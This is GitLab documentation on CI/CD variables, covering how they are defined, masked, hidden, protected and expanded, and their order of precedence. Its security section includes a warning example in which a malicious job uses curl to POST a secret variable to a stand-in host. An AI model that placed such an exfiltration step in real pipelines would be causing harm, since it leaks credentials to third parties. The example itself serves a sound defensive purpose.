Use the [`value` and `description`](../yaml/_index.md#variablesdescription) keywords to define [variables that are prefilled](../pipelines/_index.md#prefill-variables-in-manual-pipelines) for [manually-triggered pipelines](../pipelines/_index.md#run-a-pipeline-manually).

### Skip default variables in a single job

If you don't want default variables to be available in a job, set `variables` to `{}`:

```yaml
variables:
  DEFAULT_VAR: "A default variable"

job1:
  variables: {}
  script:
    - echo This job does not need any variables
```

## Define a CI/CD variable in the UI

Sensitive variables like tokens or passwords should be stored in the settings in the UI, not [in the `.gitlab-ci.yml` file](#define-a-cicd-variable-in-the-gitlab-ciyml-file). Add CI/CD variables in the UI:

- For a project [in the project's settings](#for-a-project).
- For all projects in a group [in the group's settings](#for-a-group).
- For all projects in a GitLab instance [in the instance's settings](#for-an-instance).

Alternatively, these variables can be added by using the API:

- [With the project-level variables API endpoint](../../api/project_level_variables.md).
- [With the group-level variables API endpoint](../../api/group_level_variables.md).
- [With the instance-level variables API endpoint](../../api/instance_level_ci_variables.md).

By default, pipelines from forked projects can't access the CI/CD variables available to the parent project.
If you [run a merge request pipeline in the parent project for a merge request from a fork](../pipelines/merge_request_pipelines.md#run-pipelines-in-the-parent-project), all variables become available to the pipeline. ### For a project You can add CI/CD variables to a project's settings. Projects can have a maximum of 8000 CI/CD variables. Prerequisites: - You must be a project member with the Maintainer role. To add or update variables in the project settings: 1. On the left sidebar, select **Search or go to** and find your project. 1. Select **Settings > CI/CD**. 1. Expand **Variables**. 1. Select **Add variable** and fill in the details: - **Key**: Must be one line, with no spaces, using only letters, numbers, or `_`. - **Value**: No limitations. - **Type**: `Variable` (default) or [`File`](#use-file-type-cicd-variables). - **Environment scope**: Optional. **All (default)** (`*`), a specific [environment](../environments/_index.md#types-of-environments), or a wildcard [environment scope](../environments/_index.md#limit-the-environment-scope-of-a-cicd-variable). - **Protect variable** Optional. If selected, the variable is only available in pipelines that run on [protected branches](../../user/project/repository/branches/protected.md) or [protected tags](../../user/project/protected_tags.md). - **Visibility**: Select **Visible** (default), [**Masked**](#mask-a-cicd-variable), or [**Masked and hidden**](#hide-a-cicd-variable) (only available for new variables). After you create a variable, you can use it in the pipeline configuration or in [job scripts](job_scripts.md). ### For a group You can make a CI/CD variable available to all projects in a group. Groups can have a maximum of 30000 CI/CD variables. Prerequisites: - You must be a group member with the Owner role. To add a group variable: 1. On the left sidebar, select **Search or go to** and find your group. 1. Select **Settings > CI/CD**. 1. Expand **Variables**. 1. 
Select **Add variable** and fill in the details: - **Key**: Must be one line, with no spaces, using only letters, numbers, or `_`. - **Value**: No limitations. - **Type**: `Variable` (default) or [`File`](#use-file-type-cicd-variables). - **Protect variable** Optional. If selected, the variable is only available in pipelines that run on [protected branches](../../user/project/repository/branches/protected.md) or [protected tags](../../user/project/protected_tags.md). - **Visibility**: Select **Visible** (default), [**Masked**](#mask-a-cicd-variable), or [**Masked and hidden**](#hide-a-cicd-variable) (only available for new variables). The group variables that are available in a project are listed in the project's **Settings > CI/CD > Variables** section. Variables from [subgroups](../../user/group/subgroups/_index.md) are recursively inherited. #### Environment scope {{< details >}} - Tier: Premium, Ultimate {{< /details >}} To set a group CI/CD variable to only be available for certain environments: 1. On the left sidebar, select **Search or go to** and find your group. 1. Select **Settings > CI/CD**. 1. Expand **Variables**. 1. To the right of the variable, select **Edit** ({{< icon name="pencil" >}}). 1. For **Environment scope**, select **All (default)** (`*`), a specific [environment](../environments/_index.md#types-of-environments), or a wildcard [environment scope](../environments/_index.md#limit-the-environment-scope-of-a-cicd-variable). ### For an instance {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab Self-Managed, GitLab Dedicated {{< /details >}} You can make a CI/CD variable available to all projects and groups in a GitLab instance. Prerequisites: - You must have administrator access to the instance. To add an instance variable: 1. On the left sidebar, at the bottom, select **Admin**. 1. Select **Settings > CI/CD**. 1. Expand **Variables**. 1. 
Select **Add variable** and fill in the details: - **Key**: Must be one line, with no spaces, using only letters, numbers, or `_`. - **Value**: The value is limited to 10,000 characters, but also bounded by any limits in the runner's operating system. - **Type**: `Variable` (default) or [`File`](#use-file-type-cicd-variables). - **Protect variable** Optional. If selected, the variable is only available in pipelines that run on [protected branches](../../user/project/repository/branches/protected.md) or [protected tags](../../user/project/protected_tags.md). - **Visibility**: Select **Visible** (default), [**Masked**](#mask-a-cicd-variable), or [**Masked and hidden**](#hide-a-cicd-variable) (only available for new variables). ## CI/CD variable security Code pushed to the `.gitlab-ci.yml` file could compromise your variables. Variables could be accidentally exposed in a job log, or maliciously sent to a third party server. Review all merge requests that introduce changes to the `.gitlab-ci.yml` file before you: - [Run a pipeline in the parent project for a merge request submitted from a forked project](../pipelines/merge_request_pipelines.md#run-pipelines-in-the-parent-project). - Merge the changes. Review the `.gitlab-ci.yml` file of imported projects before you add files or run pipelines against them. The following example shows malicious code in a `.gitlab-ci.yml` file: ```yaml accidental-leak-job: script: # Password exposed accidentally - echo "This script logs into the DB with $USER $PASSWORD" - db-login $USER $PASSWORD malicious-job: script: # Secret exposed maliciously - curl --request POST --data "secret_variable=$SECRET_VARIABLE" "https://maliciouswebsite.abcd/" ``` To help reduce the risk of accidentally leaking secrets through scripts like in `accidental-leak-job`, all variables containing sensitive information should always be [masked in job logs](#mask-a-cicd-variable). 
You can also [limit a variable to protected branches and tags only](#protect-a-cicd-variable). Alternatively, use one of the native GitLab integrations to connect with third party secrets manager providers to store and retrieve secrets: - [HashiCorp Vault](../secrets/_index.md) - [Azure Key Vault](../secrets/azure_key_vault.md) - [Google Secret Manager](../secrets/gcp_secret_manager.md) You can also use [OpenID Connect (OIDC) authentication](../secrets/id_token_authentication.md) for secrets managers which do not have a native integration. Malicious scripts like in `malicious-job` must be caught during the review process. Reviewers should never trigger a pipeline when they find code like this, because malicious code can compromise both masked and protected variables. Variable values are encrypted using [`aes-256-cbc`](https://en.wikipedia.org/wiki/Advanced_Encryption_Standard) and stored in the database. This data can only be read and decrypted with a valid [secrets file](../../administration/backup_restore/troubleshooting_backup_gitlab.md#when-the-secrets-file-is-lost). ### Mask a CI/CD variable {{< alert type="warning" >}} Masking a CI/CD variable is not a guaranteed way to prevent malicious users from accessing variable values. To ensure security of sensitive information, consider using [external secrets](../secrets/_index.md) and [file type variables](#use-file-type-cicd-variables) to prevent commands such as `env`/`printenv` from printing secret variables. {{< /alert >}} You can mask a project, group, or instance CI/CD variable so the value of the variable does not display in job logs. When a masked CI/CD variable would be displayed in a job log, the value is replaced with `[masked]` to prevent the value from being exposed. Prerequisites: - You must have the same role or access level as required to [add a CI/CD variable in the UI](#define-a-cicd-variable-in-the-ui). To mask a variable: 1. 
For the group, project, or in the **Admin** area, select **Settings > CI/CD**.
1. Expand **Variables**.
1. Next to the variable you want to mask, select **Edit**.
1. Under **Visibility**, select **Mask variable**.
1. Select **Update variable**.

The method used to mask variables [limits what can be included in a masked variable](https://gitlab.com/gitlab-org/gitlab-foss/-/issues/13784#note_106756757). The value of the variable must:

- Be a single line with no spaces.
- Be 8 characters or longer.
- Not match the name of an existing predefined or custom CI/CD variable.
- Not include non-alphanumeric characters other than `@`, `_`, `-`, `:`, or `+`.

Additionally, if [variable expansion](#prevent-cicd-variable-expansion) is enabled, the value can contain only:

- Characters from the Base64 alphabet (RFC4648).
- The `@`, `:`, `.`, or `~` characters.

Masking a variable automatically masks the value anywhere in a job log. If another variable has the same value, that value is also masked, including when a variable references a masked variable. The string `[MASKED]` is shown instead of the value, possibly with some trailing `x` characters.

Secrets could be revealed when `CI_DEBUG_SERVICES` is enabled. For details, read about [service container logging](../services/_index.md#capturing-service-container-logs).

### Hide a CI/CD variable

{{< history >}}

- [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/29674) in GitLab 17.4 [with a flag](../../administration/feature_flags/_index.md) named `ci_hidden_variables`. Enabled by default.
- [Generally available](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/165843) in GitLab 17.6. Feature flag `ci_hidden_variables` removed.

{{< /history >}}

In addition to masking, you can also prevent the value of CI/CD variables from being revealed in the **CI/CD** settings page. Hiding a variable is only possible when you create a new variable; you cannot update an existing variable to be hidden.
Prerequisites: - You must have the same role or access level as required to [add a CI/CD variable in the UI](#define-a-cicd-variable-in-the-ui). - The variable value must match the [requirements for masked variables](#mask-a-cicd-variable). To hide a variable, select **Masked and hidden** in the **Visibility** section when you [add a new CI/CD variable in the UI](#define-a-cicd-variable-in-the-ui). After you save the variable, the variable can be used in CI/CD pipelines, but cannot be revealed in the UI again. ### Protect a CI/CD variable You can configure a project, group, or instance CI/CD variable to be available only to pipelines that run on [protected branches](../../user/project/repository/branches/protected.md) or [protected tags](../../user/project/protected_tags.md). [Merged results pipelines](../pipelines/merged_results_pipelines.md) and [merge request pipelines](../pipelines/merge_request_pipelines.md) can optionally [access protected variables](../pipelines/merge_request_pipelines.md#control-access-to-protected-variables-and-runners). Prerequisites: - You must have the same role or access level as required to [add a CI/CD variable in the UI](#define-a-cicd-variable-in-the-ui). To set a variable as protected: 1. For the project or group, go to **Settings > CI/CD**. 1. Expand **Variables**. 1. Next to the variable you want to protect, select **Edit**. 1. Select the **Protect variable** checkbox. 1. Select **Update variable**. The variable is available for all subsequent pipelines. ### Use file type CI/CD variables All predefined CI/CD variables and variables defined in the `.gitlab-ci.yml` file are "variable" type ([`variable_type` of `env_var` in the API](#define-a-cicd-variable-in-the-ui)). Variable type variables: - Consist of a key and value pair. - Are made available in jobs as environment variables, with: - The CI/CD variable key as the environment variable name. - The CI/CD variable value as the environment variable value. 
Project, group, and instance CI/CD variables are "variable" type by default, but can optionally be set as a "file" type ([`variable_type` of `file` in the API](#define-a-cicd-variable-in-the-ui)). File type variables: - Consist of a key, value, and file. - Are made available in jobs as environment variables, with: - The CI/CD variable key as the environment variable name. - The CI/CD variable value saved to a temporary file. - The path to the temporary file as the environment variable value. Use file type CI/CD variables for tools that need a file as input. [The AWS CLI](https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-envvars.html) and [`kubectl`](https://kubernetes.io/docs/concepts/configuration/organize-cluster-access-kubeconfig/#the-kubeconfig-environment-variable) are both tools that use `File` type variables for configuration. For example, if you are using `kubectl` with: - A variable with a key of `KUBE_URL` and `https://example.com` as the value. - A file type variable with a key of `KUBE_CA_PEM` and a certificate as the value. Pass `KUBE_URL` as a `--server` option, which accepts a variable, and pass `$KUBE_CA_PEM` as a `--certificate-authority` option, which accepts a path to a file: ```shell kubectl config set-cluster e2e --server="$KUBE_URL" --certificate-authority="$KUBE_CA_PEM" ``` #### Use a `.gitlab-ci.yml` variable as a file type variable You cannot set a CI/CD variable [defined in the `.gitlab-ci.yml` file](#define-a-cicd-variable-in-the-gitlab-ciyml-file) as a file type variable. If you have a tool that requires a file path as an input, but you want to use a variable defined in the `.gitlab-ci.yml`: - Run a command that saves the value of the variable in a file. - Use that file with your tool. 
For example:

```yaml
variables:
  SITE_URL: "https://gitlab.example.com"

job:
  script:
    - echo "$SITE_URL" > "site-url.txt"
    - mytool --url-file="site-url.txt"
```

## Prevent CI/CD variable expansion

Expanded variables treat values with the `$` character as a reference to another variable. CI/CD variables are expanded by default. To treat variables with a `$` character as raw strings, disable variable expansion for the variable.

Prerequisites:

- You must have the same role or access level as required to [add a CI/CD variable in the UI](#define-a-cicd-variable-in-the-ui).

To disable variable expansion for the variable:

1. For the project or group, go to **Settings > CI/CD**.
1. Expand **Variables**.
1. Next to the variable you do not want expanded, select **Edit**.
1. Clear the **Expand variable** checkbox.
1. Select **Update variable**.

## CI/CD variable precedence

{{< history >}}

- Scan Execution Policies variable precedence was [changed](https://gitlab.com/gitlab-org/gitlab/-/issues/424028) in GitLab 16.7 [with a flag](../../administration/feature_flags/_index.md) named `security_policies_variables_precedence`. Enabled by default. [Feature flag removed in GitLab 16.8](https://gitlab.com/gitlab-org/gitlab/-/issues/435727).

{{< /history >}}

You can use CI/CD variables with the same name in different places, but the values can overwrite each other. The type of variable and where it is defined determine which variable takes precedence.

The order of precedence for variables is (from highest to lowest):

1. [Pipeline execution policy variables](../../user/application_security/policies/pipeline_execution_policies.md#cicd-variables).
1. [Scan execution policy variables](../../user/application_security/policies/scan_execution_policies.md).
1. [Pipeline variables](#use-pipeline-variables). These variables all have the same precedence:
   - [Variables passed to downstream pipelines](../pipelines/downstream_pipelines.md#pass-cicd-variables-to-a-downstream-pipeline).
- [Trigger variables](../triggers/_index.md#pass-cicd-variables-in-the-api-call). - [Scheduled pipeline variables](../pipelines/schedules.md#add-a-pipeline-schedule). - [Manual pipeline run variables](../pipelines/_index.md#run-a-pipeline-manually). - Variables added when [creating a pipeline with the API](../../api/pipelines.md#create-a-new-pipeline). - [Manual job variables](../jobs/job_control.md#specify-variables-when-running-manual-jobs). 1. Project [variables](#for-a-project). 1. Group [variables](#for-a-group). If the same variable name exists in a group and its subgroups, the job uses the value from the closest subgroup. For example, if you have `Group > Subgroup 1 > Subgroup 2 > Project`, the variable defined in `Subgroup 2` takes precedence. 1. Instance [variables](#for-an-instance). 1. [Variables from `dotenv` reports](job_scripts.md#pass-an-environment-variable-to-another-job). 1. Job variables, defined in jobs in the `.gitlab-ci.yml` file. 1. Default variables for all jobs, defined at the top-level of the `.gitlab-ci.yml` file. 1. [Deployment variables](predefined_variables.md#deployment-variables). 1. [Predefined variables](predefined_variables.md). For example: ```yaml variables: API_TOKEN: "default" job1: variables: API_TOKEN: "secure" script: - echo "The variable is '$API_TOKEN'" ``` In this example, `job1` outputs `The variable is 'secure'` because variables defined in jobs in the `.gitlab-ci.yml` file have higher precedence than default variables. ## Use pipeline variables Pipeline variables are variables that are specified when running a new pipeline. Prerequisites: - You must have the Developer role in the project. You can specify a pipeline variable when you: - [Run a pipeline manually](../pipelines/_index.md#run-a-pipeline-manually) in the UI. - Create a pipeline by using [the `pipelines` API endpoint](../../api/pipelines.md#create-a-new-pipeline). 
- Create a pipeline by using [the `triggers` API endpoint](../triggers/_index.md#pass-cicd-variables-in-the-api-call). - Use [push options](../../topics/git/commit.md#push-options-for-gitlab-cicd). - Pass variables to a downstream pipeline by using either the [`variables` keyword](../pipelines/downstream_pipelines.md#pass-cicd-variables-to-a-downstream-pipeline), [`trigger:forward` keyword](../yaml/_index.md#triggerforward) or [`dotenv` variables](../pipelines/downstream_pipelines.md#pass-dotenv-variables-created-in-a-job). These variables have [higher precedence](#cicd-variable-precedence) and can override other defined variables, including [predefined variables](predefined_variables.md). {{< alert type="warning" >}} You should avoid overriding predefined variables in most cases, as it can cause the pipeline to behave unexpectedly. {{< /alert >}} {{< alert type="note" >}} In [GitLab 17.7](../../update/deprecations.md#increased-default-security-for-use-of-pipeline-variables) and later, [pipeline inputs](../inputs/_index.md#for-a-pipeline) are recommended over passing pipeline variables. For enhanced security, you should [disable pipeline variables](#restrict-pipeline-variables) when using inputs. {{< /alert >}} ### Restrict pipeline variables {{< history >}} - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/440338) in GitLab 17.1. - For GitLab.com, setting defaults [updated for all new projects in new namespaces](https://gitlab.com/gitlab-org/gitlab/-/issues/502382) to `no_one_allowed` for `ci_pipeline_variables_minimum_override_role` in GitLab 17.7. {{< /history >}} You can limit who can [run pipelines with pipeline variables](#use-pipeline-variables) to specific user roles. When users with a lower role try to use pipeline variables, they receive an `Insufficient permissions to set pipeline variables` error message. Prerequisites: - You must have the Maintainer role in the project. 
If the minimum role was previously set to `owner` or `no_one_allowed`, then you must have the Owner role in the project.

To limit the use of pipeline variables to only the Maintainer role and higher:

- Go to **Settings > CI/CD > Variables**.
- Under **Minimum role to use pipeline variables**, select one of:
  - `no_one_allowed`: No pipelines can run with pipeline variables. Default for new projects in new namespaces on GitLab.com.
  - `owner`: Only users with the Owner role can run pipelines with pipeline variables. You must have the Owner role for the project to change the setting to this value.
  - `maintainer`: Only users with at least the Maintainer role can run pipelines with pipeline variables. Default when not specified on GitLab Self-Managed and GitLab Dedicated.
  - `developer`: Only users with at least the Developer role can run pipelines with pipeline variables.

You can also use [the projects API](../../api/projects.md#edit-a-project) to set the role for the `ci_pipeline_variables_minimum_override_role` setting.

This restriction does not affect the use of CI/CD variables from the project or group settings. Most jobs can still use the `variables` keyword in the YAML configuration, but not jobs that use the `trigger` keyword to trigger downstream pipelines. Trigger jobs pass variables to downstream pipelines as pipeline variables, which is also controlled by this setting.

## Exporting variables

Scripts executed in separate shell contexts do not share exports, aliases, local function definitions, or any other local shell updates. This means that if a job fails, variables created by user-defined scripts are not exported.

When runners execute jobs defined in `.gitlab-ci.yml`:

- Scripts specified in `before_script` and the main script are executed together in a single shell context, and are concatenated.
- Scripts specified in `after_script` run in a shell context completely separate from the `before_script` and the specified scripts.
Regardless of the shell the scripts are executed in, the runner output includes: - Predefined variables. - Variables defined in: - Instance, group, or project CI/CD settings. - The `.gitlab-ci.yml` file in the `variables:` section. - The `.gitlab-ci.yml` file in the `secrets:` section. - The `config.toml`. The runner cannot handle manual exports, shell aliases, and functions executed in the body of the script, like `export MY_VARIABLE=1`. For example, in the following `.gitlab-ci.yml` file, the following scripts are defined: ```yaml job: variables: JOB_DEFINED_VARIABLE: "job variable" before_script: - echo "This is the 'before_script' script" - export MY_VARIABLE="variable" script: - echo "This is the 'script' script" - echo "JOB_DEFINED_VARIABLE's value is ${JOB_DEFINED_VARIABLE}" - echo "CI_COMMIT_SHA's value is ${CI_COMMIT_SHA}" - echo "MY_VARIABLE's value is ${MY_VARIABLE}" after_script: - echo "JOB_DEFINED_VARIABLE's value is ${JOB_DEFINED_VARIABLE}" - echo "CI_COMMIT_SHA's value is ${CI_COMMIT_SHA}" - echo "MY_VARIABLE's value is ${MY_VARIABLE}" ``` When the runner executes the job: 1. `before_script` is executed: 1. Prints to the output. 1. Defines the variable for `MY_VARIABLE`. 1. `script` is executed: 1. Prints to the output. 1. Prints the value of `JOB_DEFINED_VARIABLE`. 1. Prints the value of `CI_COMMIT_SHA`. 1. Prints the value of `MY_VARIABLE`. 1. `after_script` is executed in a new, separate shell context: 1. Prints to the output. 1. Prints the value of `JOB_DEFINED_VARIABLE`. 1. Prints the value of `CI_COMMIT_SHA`. 1. Prints an empty value of `MY_VARIABLE`. The variable value cannot be detected because `after_script` is in a separate shell context to `before_script`. ## Related topics - You can configure [Auto DevOps](../../topics/autodevops/_index.md) to pass CI/CD variables to a running application. 
To make a CI/CD variable available as an environment variable in the running application's container, [prefix the variable key](../../topics/autodevops/cicd_variables.md#configure-application-secret-variables) with `K8S_SECRET_`.
- The [Managing the Complex Configuration Data Management Monster Using GitLab](https://www.youtube.com/watch?v=v4ZOJ96hAck) video is a walkthrough of the [Complex Configuration Data Monorepo](https://gitlab.com/guided-explorations/config-data-top-scope/config-data-subscope/config-data-monorepo) working example project. It explains how multiple levels of group CI/CD variables can be combined with environment-scoped project variables for complex configuration of application builds or deployments. The example can be copied to your own group or instance for testing. More details on the other GitLab CI/CD patterns demonstrated are available on the project page.
- You can [pass CI/CD variables to downstream pipelines](../pipelines/downstream_pipelines.md#pass-cicd-variables-to-a-downstream-pipeline). Use the [`trigger:forward`](../yaml/_index.md#triggerforward) keyword to specify what type of variables to pass to the downstream pipeline.
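To sketch that last point, a trigger job might forward variables to a downstream pipeline like this. This is an illustrative fragment only; the job name, variable name, and project path are placeholders:

```yaml
trigger-downstream:
  variables:
    DEPLOY_TARGET: "staging"    # trigger job variables are forwarded by default (yaml_variables: true)
  trigger:
    project: my-group/my-downstream-project    # placeholder project path
    forward:
      pipeline_variables: true    # also forward variables specified when this pipeline was run
```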
---
stage: Verify
group: Pipeline Authoring
info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
title: Where variables can be used
---
{{< details >}}

- Tier: Free, Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

As described in the [CI/CD variables](_index.md) documentation, you can define many different variables. Some can be used with all GitLab CI/CD features, while others are more limited. This document describes where and how the different types of variables can be used.

## Variables usage

Defined variables can be used in two places:

1. On the GitLab side, in the `.gitlab-ci.yml` file.
1. On the GitLab Runner side, in `config.toml`.

### `.gitlab-ci.yml` file

{{< history >}}

- Support for `CI_ENVIRONMENT_*` variables except `CI_ENVIRONMENT_SLUG` [introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/128694) in GitLab 16.4.

{{< /history >}}

| Definition | Can be expanded? | Expansion place | Description |
|:-----------|:-----------------|:----------------|:------------|
| [`after_script`](../yaml/_index.md#after_script) | yes | Script execution shell | The variable expansion is made by the [execution shell environment](#execution-shell-environment). |
| [`artifacts:name`](../yaml/_index.md#artifactsname) | yes | Runner | The variable expansion is made by GitLab Runner's [internal variable expansion mechanism](#gitlab-runner-internal-variable-expansion-mechanism). |
| [`artifacts:paths`](../yaml/_index.md#artifactspaths) | yes | Runner | The variable expansion is made by GitLab Runner's [internal variable expansion mechanism](#gitlab-runner-internal-variable-expansion-mechanism). |
| [`artifacts:exclude`](../yaml/_index.md#artifactsexclude) | yes | Runner | The variable expansion is made by GitLab Runner's [internal variable expansion mechanism](#gitlab-runner-internal-variable-expansion-mechanism). |
| [`before_script`](../yaml/_index.md#before_script) | yes | Script execution shell | The variable expansion is made by the [execution shell environment](#execution-shell-environment). |
| [`cache:key`](../yaml/_index.md#cachekey) | yes | Runner | The variable expansion is made by GitLab Runner's [internal variable expansion mechanism](#gitlab-runner-internal-variable-expansion-mechanism). |
| [`cache:paths`](../yaml/_index.md#cachepaths) | yes | Runner | The variable expansion is made by GitLab Runner's [internal variable expansion mechanism](#gitlab-runner-internal-variable-expansion-mechanism). |
| [`cache:policy`](../yaml/_index.md#cachepolicy) | yes | Runner | The variable expansion is made by GitLab Runner's [internal variable expansion mechanism](#gitlab-runner-internal-variable-expansion-mechanism). |
| [`environment:name`](../yaml/_index.md#environmentname) | yes | GitLab | Similar to `environment:url`, but the variable expansion doesn't support the following:<br/><br/>- `CI_ENVIRONMENT_*` variables.<br/>- [Persisted variables](#persisted-variables). |
| [`environment:url`](../yaml/_index.md#environmenturl) | yes | GitLab | The variable expansion is made by the [internal variable expansion mechanism](#gitlab-internal-variable-expansion-mechanism) in GitLab.<br/><br/>Supported are all variables defined for a job (project/group variables, variables from `.gitlab-ci.yml`, variables from triggers, variables from pipeline schedules).<br/><br/>Not supported are variables defined in the GitLab Runner `config.toml` and variables created in the job's `script`. |
| [`environment:auto_stop_in`](../yaml/_index.md#environmentauto_stop_in) | yes | GitLab | The variable expansion is made by the [internal variable expansion mechanism](#gitlab-internal-variable-expansion-mechanism) in GitLab.<br/><br/>The value of the variable being substituted should be a period of time in a human-readable natural language form. See [supported values](../yaml/_index.md#environmentauto_stop_in) for more information. |
| [`environment:kubernetes:agent`](../yaml/_index.md#environmentkubernetes) | yes | GitLab | Similar to `environment:url`, but the variable expansion does not support the following:<br/><br/>- `CI_ENVIRONMENT_*` variables.<br/>- [Persisted variables](#persisted-variables). |
| [`environment:kubernetes:namespace`](../yaml/_index.md#environmentkubernetes) | yes | GitLab | Similar to `environment:url`, but the variable expansion does not support the following:<br/><br/>- `CI_ENVIRONMENT_*` variables.<br/>- [Persisted variables](#persisted-variables). |
| [`id_tokens:aud`](../yaml/_index.md#id_tokens) | yes | GitLab | The variable expansion is made by the [internal variable expansion mechanism](#gitlab-internal-variable-expansion-mechanism) in GitLab. Variable expansion [introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/414293) in GitLab 16.1. |
| [`image`](../yaml/_index.md#image) | yes | Runner | The variable expansion is made by GitLab Runner's [internal variable expansion mechanism](#gitlab-runner-internal-variable-expansion-mechanism). |
| [`include`](../yaml/_index.md#include) | yes | GitLab | The variable expansion is made by the [internal variable expansion mechanism](#gitlab-internal-variable-expansion-mechanism) in GitLab.<br/><br/>See [Use variables with include](../yaml/includes.md#use-variables-with-include) for more information on supported variables. |
| [`resource_group`](../yaml/_index.md#resource_group) | yes | GitLab | Similar to `environment:url`, but the variable expansion doesn't support the following:<br/>- `CI_ENVIRONMENT_URL`<br/>- [Persisted variables](#persisted-variables). |
| [`rules:changes`](../yaml/_index.md#ruleschanges) | no | GitLab | The variable expansion is made by the [internal variable expansion mechanism](#gitlab-internal-variable-expansion-mechanism) in GitLab. |
| [`rules:changes:compare_to`](../yaml/_index.md#ruleschangescompare_to) | no | GitLab | The variable expansion is made by the [internal variable expansion mechanism](#gitlab-internal-variable-expansion-mechanism) in GitLab. |
| [`rules:exists`](../yaml/_index.md#rulesexists) | no | GitLab | The variable expansion is made by the [internal variable expansion mechanism](#gitlab-internal-variable-expansion-mechanism) in GitLab. |
| [`rules:if`](../yaml/_index.md#rulesif) | no | Not applicable | The variable must be in the form of `$variable`. Not supported are the following:<br/><br/>- `CI_ENVIRONMENT_SLUG` variable.<br/>- [Persisted variables](#persisted-variables). |
| [`script`](../yaml/_index.md#script) | yes | Script execution shell | The variable expansion is made by the [execution shell environment](#execution-shell-environment). |
| [`services:name`](../yaml/_index.md#services) | yes | Runner | The variable expansion is made by GitLab Runner's [internal variable expansion mechanism](#gitlab-runner-internal-variable-expansion-mechanism). |
| [`services`](../yaml/_index.md#services) | yes | Runner | The variable expansion is made by GitLab Runner's [internal variable expansion mechanism](#gitlab-runner-internal-variable-expansion-mechanism). |
| [`tags`](../yaml/_index.md#tags) | yes | GitLab | The variable expansion is made by the [internal variable expansion mechanism](#gitlab-internal-variable-expansion-mechanism) in GitLab. |
| [`trigger` and `trigger:project`](../yaml/_index.md#trigger) | yes | GitLab | The variable expansion is made by the [internal variable expansion mechanism](#gitlab-internal-variable-expansion-mechanism) in GitLab. Variable expansion for `trigger:project` [introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/367660) in GitLab 15.3. |
| [`variables`](../yaml/_index.md#variables) | yes | GitLab/Runner | The variable expansion is first made by the [internal variable expansion mechanism](#gitlab-internal-variable-expansion-mechanism) in GitLab, and then any unrecognized or unavailable variables are expanded by GitLab Runner's [internal variable expansion mechanism](#gitlab-runner-internal-variable-expansion-mechanism). |
| [`workflow:name`](../yaml/_index.md#workflowname) | yes | GitLab | The variable expansion is made by the [internal variable expansion mechanism](#gitlab-internal-variable-expansion-mechanism) in GitLab.<br/><br/>Supported are all variables available in `workflow`:<br/>- Project/Group variables.<br/>- Global `variables` and `workflow:rules:variables` (when matching the rule).<br/>- Variables inherited from parent pipelines.<br/>- Variables from triggers.<br/>- Variables from pipeline schedules.<br/><br/>Not supported are variables defined in the GitLab Runner `config.toml`, variables defined in jobs, or [Persisted variables](#persisted-variables). |

### `config.toml` file

| Definition | Can be expanded? | Description |
|:-----------|:-----------------|:------------|
| `runners.environment` | yes | The variable expansion is made by GitLab Runner's [internal variable expansion mechanism](#gitlab-runner-internal-variable-expansion-mechanism). |
| `runners.kubernetes.pod_labels` | yes | The variable expansion is made by GitLab Runner's [internal variable expansion mechanism](#gitlab-runner-internal-variable-expansion-mechanism). |
| `runners.kubernetes.pod_annotations` | yes | The variable expansion is made by GitLab Runner's [internal variable expansion mechanism](#gitlab-runner-internal-variable-expansion-mechanism). |

You can read more about `config.toml` in the [GitLab Runner docs](https://docs.gitlab.com/runner/configuration/advanced-configuration.html).
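As a sketch of the `config.toml` entries above, variables can be referenced in `runners.environment` and `runners.kubernetes.pod_labels`, and the runner expands them per job (the runner name and values here are illustrative):

```toml
[[runners]]
  name = "example-runner"  # illustrative runner name
  # Expanded by the runner's internal expansion mechanism at job start:
  environment = ["BUILD_DIR=${CI_PROJECT_DIR}/build"]
  [runners.kubernetes]
    [runners.kubernetes.pod_labels]
      # Label each job pod with the job name, expanded per job:
      "job-name" = "${CI_JOB_NAME}"
```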
## Expansion mechanisms

There are three expansion mechanisms:

- GitLab
- GitLab Runner
- Execution shell environment

### GitLab internal variable expansion mechanism

The expanded part needs to be in the form `$variable`, `${variable}`, or `%variable%`. Each form is handled in the same way, no matter which OS/shell handles the job, because the expansion is done in GitLab before any runner gets the job.

#### Nested variable expansion

GitLab expands job variable values recursively before sending them to the runner. For example, in the following scenario:

```yaml
- BUILD_ROOT_DIR: '${CI_BUILDS_DIR}'
- OUT_PATH: '${BUILD_ROOT_DIR}/out'
- PACKAGE_PATH: '${OUT_PATH}/pkg'
```

The runner receives a valid, fully-formed path. For example, if `${CI_BUILDS_DIR}` is `/output`, then `PACKAGE_PATH` would be `/output/out/pkg`.

References to unavailable variables are left intact. In this case, the runner [attempts to expand the variable value](#gitlab-runner-internal-variable-expansion-mechanism) at runtime. For example, a variable like `CI_BUILDS_DIR` is known by the runner only at runtime.

### GitLab Runner internal variable expansion mechanism

- Supported: project/group variables, `.gitlab-ci.yml` variables, `config.toml` variables, and variables from triggers, pipeline schedules, and manual pipelines.
- Not supported: variables defined inside of scripts (for example, `export MY_VARIABLE="test"`).

The runner uses Go's `os.Expand()` method for variable expansion, which means it handles only variables defined as `$variable` and `${variable}`. Also important: the expansion is done only once, so nested variables may or may not work, depending on the ordering of variable definitions, and whether [nested variable expansion](#nested-variable-expansion) is enabled in GitLab.
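As a sketch of the "not supported" case above, a variable exported inside `script` is not available when the runner expands `artifacts:name`, while a job-level variable is (the job and variable names here are illustrative):

```yaml
job:
  variables:
    BUILD_ID: "42"            # known to the runner, so it expands in artifacts:name
  script:
    - export RUNTIME_ID="7"   # defined inside the script, so it is NOT available to the runner's expansion
    - mkdir -p bundle && touch bundle/output.txt
  artifacts:
    name: "bundle-${BUILD_ID}-${RUNTIME_ID}"   # BUILD_ID expands; RUNTIME_ID does not
    paths:
      - bundle/
```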
